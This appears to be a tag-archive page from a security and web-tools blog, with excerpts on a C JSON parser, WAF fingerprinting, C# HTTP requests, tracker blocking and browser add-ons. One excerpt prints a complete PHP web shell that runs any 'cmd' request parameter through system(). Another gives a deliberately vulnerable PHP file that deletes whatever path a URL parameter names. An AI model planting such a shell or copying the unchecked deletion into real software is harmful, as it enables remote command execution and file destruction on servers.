Tag: web

C

Parsing JSON in C

jsmn is a minimalistic JSON parser in C. It can be easily integrated into the resource-limited projects or embedded systems. Library sources are available at bitbucket.org/zserge/jsmn. Features > simple > highly portable (tested on x86/amd64, ARM, AVR) > compatible with C89 > no dependencies (even libc!) > no dynamic memory allocation > extremely small code …

Detection, Firewall

How to detect Web Application Firewalls

WAFW00F – Web Application Firewall Detection Tool – identifies and fingerprints Web Application Firewall (WAF) products. To do its magic, WAFW00F does the following: > Sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions. > If that is not successful, it sends a number of (potentially malicious) HTTP …

C#

How to make a Http Web Request properly using C#

//.. private HttpWebRequest _httpwebrequest; //..//.. private HttpWebRequest _httpwebrequest; //.. private void button1_Click(object sender, EventArgs e) { Thread t = new Thread(new ThreadStart(Test)); t.IsBackground = true; t.Start(); }private void button1_Click(object sender, EventArgs e) { Thread t = new Thread(new ThreadStart(Test)); t.IsBackground = true; t.Start(); } public void Test() { Dictionary<String, String> dict = new Dictionary<String, String>(); …

PHP, Web Shell

A quick and dirty php web shell

<?php if(isset($_REQUEST[’cmd’])){ echo "Command: <span style=’color:red;’><b>".$_REQUEST[’cmd’]."</b></span> executed."; echo "<pre style=’border:solid 3px red;background:black;color:white;padding:10px;font-size:14px;’>"; $cmd = ($_REQUEST[’cmd’]); system($cmd); echo "</ pre>"; die; }<?php if(isset($_REQUEST[‘cmd’])){ echo "Command: <span style=’color:red;’><b>".$_REQUEST[‘cmd’]."</b></span> executed."; echo "<pre style=’border:solid 3px red;background:black;color:white;padding:10px;font-size:14px;’>"; $cmd = ($_REQUEST[‘cmd’]); system($cmd); echo "</ pre>"; die; }

Injection, PHP, Vulnerabilities

PHP Command Injection Vulnerability in Web applications

Create a new PHP file, name it test_command_injection.php, and save it inside Apache’s htdocs directory: <?php if(isset($_GET[’filename’])) { $filename = $_GET[’filename’]; if(file_exists($filename)) { unlink($filename); } }<?php if(isset($_GET[‘filename’])) { $filename = $_GET[‘filename’]; if(file_exists($filename)) { unlink($filename); } } Open your favorite browser and open url: http://localhost/test_command_injection.php?filename=path_to_file_4_deletion As you can see you could delete any file in the …

Anonymity, Detection, Firefox, Privacy, Protection

Defeat web trackers

Ghostery sees the “invisible” web, detecting trackers, web bugs, pixels, and beacons placed on web pages by Facebook, Google Analytics, and over 1,000 other ad networks, behavioral data providers, web publishers – all companies interested in your activity. After showing you who operates behind the scenes, Ghostery also gives you the opportunity to learn more …

Detection, Probing, WEB

Web Application Fingerprinter – Discover Web Application

The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable. Sourceforge Project Page: https://sourceforge.net/projects/blindelephant/ Discussion and Forums: http://www.qualys.com/blindelephant License: LGPL …

Add-ons, Browsers, Firefox, Monitor, Proxy

Monitor the data you send to the remote server

TamperData is a Firefox addon to view and modify HTTP/HTTPS headers and post parameters, trace and time http response/requests and security test web applications by modifying POST parameters. TamperData allows you to see and/or modify the requests as they are sent to the website you navigate. It is a useful tool to discover the structure …

Browsers, Crawling, WEB

Offline browser utility

HTTrack is a free (GPL, libre/free software) and easy-to-use offline browser utility. It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site’s relative link-structure. Simply open a …